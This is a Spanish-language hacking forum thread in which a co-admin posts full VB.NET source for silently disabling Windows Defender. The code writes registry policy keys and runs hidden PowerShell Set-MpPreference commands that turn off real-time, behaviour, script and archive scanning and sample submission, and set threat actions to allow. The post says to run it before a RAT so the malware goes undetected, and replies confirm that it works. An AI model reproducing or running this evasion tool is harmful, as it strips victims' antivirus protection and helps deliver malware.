3. [SOURCE] Deshabilitar Windows defender en tiempo de ejecucion[VB.NET WD BYPASS]
Páginas: [1]   Ir Abajo
« anterior próximo »

[SOURCE] Deshabilitar Windows defender en tiempo de ejecucion[VB.NET WD BYPASS]

  • 4 Respuestas
  • 2851 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado 79137913

  • *
  • Co Admin
  • Mensajes: 692
  • Actividad:
    3.33%
  • Reputación 16
  • 4 Esquinas
  • Skype: [email protected]
    • Ver Perfil
    • Doors.Party
    • Email

[SOURCE] Deshabilitar Windows defender en tiempo de ejecucion[VB.NET WD BYPASS]

  • en: Mayo 30, 2019, 09:32:41 am
HOLA!!!

Les paso este codigo recien terminado para deshabilitar Windows defender en tiempo de ejecucion.

Vieron que Windows defender es casi tan histerico como Avira, suele saltar por casi cualquier cosa, solo ejecuten este codigo antes que su RAT y se va a ejecutar sin problemas sin que WD moleste.

[El metodo deshabilita Windows defender y la distribucion de muestras sin mostrar ninguna notificacion ni reiniciar la pc todo instantaneo y bonito]

Código: vb.net
  1. Imports System
  2. Imports Microsoft.Win32
  3. Imports System.Diagnostics
  4. Imports System.Security.Principal
  5.  
  6. Namespace DeshabilitarWD
  7.     Class Programa
  8.         Private Shared Sub Main()
  9.             If Not New WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator) Then Return
  10.             EditarRegistro("SOFTWARE\Microsoft\Windows Defender\Features", "TamperProtection", "0")
  11.             EditarRegistro("SOFTWARE\Policies\Microsoft\Windows Defender", "DisableAntiSpyware", "1")
  12.             EditarRegistro("SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableBehaviorMonitoring", "1")
  13.             EditarRegistro("SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableOnAccessProtection", "1")
  14.             EditarRegistro("SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableScanOnRealtimeEnable", "1")
  15.             CheckDefender()
  16.         End Sub
  17.  
  18.         Private Shared Sub CheckDefender()
  19.             Dim proc As Process = New Process With {
  20.                 .StartInfo = New ProcessStartInfo With {
  21.                     .FileName = "powershell",
  22.                     .Arguments = "Get-MpPreference -verbose",
  23.                     .UseShellExecute = False,
  24.                     .RedirectStandardOutput = True,
  25.                     .WindowStyle = ProcessWindowStyle.Hidden,
  26.                     .CreateNoWindow = True
  27.                 }
  28.             }
  29.             proc.Start()
  30.  
  31.             While Not proc.StandardOutput.EndOfStream
  32.                 Dim line As String = proc.StandardOutput.ReadLine()
  33.  
  34.                 If line.Contains("DisableRealtimeMonitoring") AndAlso line.Contains("False") Then
  35.                     Pwrshll("Set-MpPreference -DisableRealtimeMonitoring $true")
  36.                 ElseIf line.Contains("DisableBehaviorMonitoring") AndAlso line.Contains("False") Then
  37.                     Pwrshll("Set-MpPreference -DisableBehaviorMonitoring $true")
  38.                 ElseIf line.Contains("DisableBlockAtFirstSeen") AndAlso line.Contains("False") Then
  39.                     Pwrshll("Set-MpPreference -DisableBlockAtFirstSeen $true")
  40.                 ElseIf line.Contains("DisableIOAVProtection") AndAlso line.Contains("False") Then
  41.                     Pwrshll("Set-MpPreference -DisableIOAVProtection $true")
  42.                 ElseIf line.Contains("DisablePrivacyMode") AndAlso line.Contains("False") Then
  43.                     Pwrshll("Set-MpPreference -DisablePrivacyMode $true")
  44.                 ElseIf line.Contains("SignatureDisableUpdateOnStartupWithoutEngine") AndAlso line.Contains("False") Then
  45.                     Pwrshll("Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true")
  46.                 ElseIf line.Contains("DisableArchiveScanning") AndAlso line.Contains("False") Then
  47.                     Pwrshll("Set-MpPreference -DisableArchiveScanning $true")
  48.                 ElseIf line.Contains("DisableIntrusionPreventionSystem") AndAlso line.Contains("False") Then
  49.                     Pwrshll("Set-MpPreference -DisableIntrusionPreventionSystem $true")
  50.                 ElseIf line.Contains("DisableScriptScanning") AndAlso line.Contains("False") Then
  51.                     Pwrshll("Set-MpPreference -DisableScriptScanning $true")
  52.                 ElseIf line.Contains("SubmitSamplesConsent") AndAlso Not line.Contains("2") Then
  53.                     Pwrshll("Set-MpPreference -SubmitSamplesConsent 2")
  54.                 ElseIf line.Contains("MAPSReporting") AndAlso Not line.Contains("0") Then
  55.                     Pwrshll("Set-MpPreference -MAPSReporting 0")
  56.                 ElseIf line.Contains("HighThreatDefaultAction") AndAlso Not line.Contains("6") Then
  57.                     Pwrshll("Set-MpPreference -HighThreatDefaultAction 6 -Force")
  58.                 ElseIf line.Contains("ModerateThreatDefaultAction") AndAlso Not line.Contains("6") Then
  59.                     Pwrshll("Set-MpPreference -ModerateThreatDefaultAction 6")
  60.                 ElseIf line.Contains("LowThreatDefaultAction") AndAlso Not line.Contains("6") Then
  61.                     Pwrshll("Set-MpPreference -LowThreatDefaultAction 6")
  62.                 ElseIf line.Contains("SevereThreatDefaultAction") AndAlso Not line.Contains("6") Then
  63.                     Pwrshll("Set-MpPreference -SevereThreatDefaultAction 6")
  64.                 End If
  65.             End While
  66.         End Sub
  67.  
  68.         Private Shared Sub Pwrshll(ByVal args As String)
  69.             Dim proc As Process = New Process With {
  70.                 .StartInfo = New ProcessStartInfo With {
  71.                     .FileName = "powershell",
  72.                     .Arguments = args,
  73.                     .WindowStyle = ProcessWindowStyle.Hidden,
  74.                     .CreateNoWindow = True
  75.                 }
  76.             }
  77.             proc.Start()
  78.         End Sub
  79.  
  80.         Private Shared Sub EditarRegistro(ByVal regPath As String, ByVal name As String, ByVal value As String)
  81.             Try
  82.  
  83.                 Using key As RegistryKey = Registry.LocalMachine.OpenSubKey(regPath, RegistryKeyPermissionCheck.ReadWriteSubTree)
  84.  
  85.                     If key Is Nothing Then
  86.                         Registry.LocalMachine.CreateSubKey(regPath).SetValue(name, value, RegistryValueKind.DWord)
  87.                         Return
  88.                     End If
  89.  
  90.                     If key.GetValue(name) <> CObj(value) Then key.SetValue(name, value, RegistryValueKind.DWord)
  91.                 End Using
  92.  
  93.             Catch
  94.             End Try
  95.         End Sub
  96.  
  97.     End Class
  98. End Namespace
  99.  


GRACIAS POR LEER!!!
En línea
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                   You are not allowed to view links. Register or Login

Desconectado AXCESS

  • *
  • Moderador Global
  • Mensajes: 785
  • Actividad:
    100%
  • Country: 00
  • Reputación 15
    • Ver Perfil
    • Email

Re:[SOURCE] Deshabilitar Windows defender en tiempo de ejecucion[VB.NET WD BYPASS]

  • en: Mayo 30, 2019, 02:57:30 pm
Está interesante y se ve muy bueno. Muchas gracias, bello trabajo.

Interrogantes:
-Y si se desea volver a activar? (cuál método emplearía?)
-Es reversible? (me parece que sí...pero es mejor preguntar)

Me surge la duda por que veo que edita el registro.



« Última modificación: Mayo 30, 2019, 03:18:13 pm por AXCESS »
En línea
You are not allowed to view links. Register or Login

Desconectado 79137913

  • *
  • Co Admin
  • Mensajes: 692
  • Actividad:
    3.33%
  • Reputación 16
  • 4 Esquinas
  • Skype: [email protected]
    • Ver Perfil
    • Doors.Party
    • Email

Re:[SOURCE] Deshabilitar Windows defender en tiempo de ejecucion[VB.NET WD BYPASS]

  • en: Mayo 31, 2019, 01:11:45 pm
HOLA!!!

1) Si deseas volver a activar tenes que poner de nuevo todos los valores como los tenias (esto depende de tu config)
2) Si, inclusive sin codigo solo desde la gui de windows

GRACIAS POR LEER!!!
En línea
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                   You are not allowed to view links. Register or Login

Desconectado AXCESS

  • *
  • Moderador Global
  • Mensajes: 785
  • Actividad:
    100%
  • Country: 00
  • Reputación 15
    • Ver Perfil
    • Email

Re:[SOURCE] Deshabilitar Windows defender en tiempo de ejecucion[VB.NET WD BYPASS]

  • en: Junio 06, 2019, 03:51:15 pm
Funciona.

Y en efecto es reversible.

Hermoso trabajo, sencillo y elegante.

Una vez más muchas gracias.
En línea
You are not allowed to view links. Register or Login

Desconectado 79137913

  • *
  • Co Admin
  • Mensajes: 692
  • Actividad:
    3.33%
  • Reputación 16
  • 4 Esquinas
  • Skype: [email protected]
    • Ver Perfil
    • Doors.Party
    • Email

Re:[SOURCE] Deshabilitar Windows defender en tiempo de ejecucion[VB.NET WD BYPASS]

  • en: Junio 06, 2019, 04:43:03 pm
HOLA!!!

You are not allowed to view links. Register or Login
Funciona.

Y en efecto es reversible.
Acaso usted dudaba de mi? ajjajaja

You are not allowed to view links. Register or Login
Hermoso trabajo, sencillo y elegante.

Una vez más muchas gracias.

Gracias, es un gran agrado que alguien aprecie mi trabajo.

P.D: esto podria llamarse "zero day" no esta parchado, puede que en un tiempo deje de funcionar.
En línea
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                   You are not allowed to view links. Register or Login
Páginas: [1]   Ir Arriba
« anterior próximo »
 

Modificar registro de Windows desde C#

Iniciado por Alejandro_N12

 Respuestas: 0
Vistas: 1490 		Último mensaje Mayo 18, 2019, 07:54:55 am
por Alejandro_N12
Windows form C# español

Iniciado por ZanGetsu

 Respuestas: 0
Vistas: 2338 		Último mensaje Junio 06, 2013, 11:50:09 pm
por ZanGetsu
[SOURCE] Fake Steam (Steam v2.70.82.9)

Iniciado por Elektro

 Respuestas: 0
Vistas: 2290 		Último mensaje Mayo 12, 2015, 11:22:33 am
por Elektro
[SOURCE-CODE] Color.NET - Color Picker

Iniciado por Aincrad

 Respuestas: 0
Vistas: 2608 		Último mensaje Noviembre 15, 2018, 11:23:02 pm
por Aincrad
[SOURCE] VB.NET. Ejecutar Payload C/persistencia usando PowerShell + Tasks

Iniciado por 79137913

 Respuestas: 3
Vistas: 2553 		Último mensaje Junio 26, 2019, 09:14:32 am
por Aincrad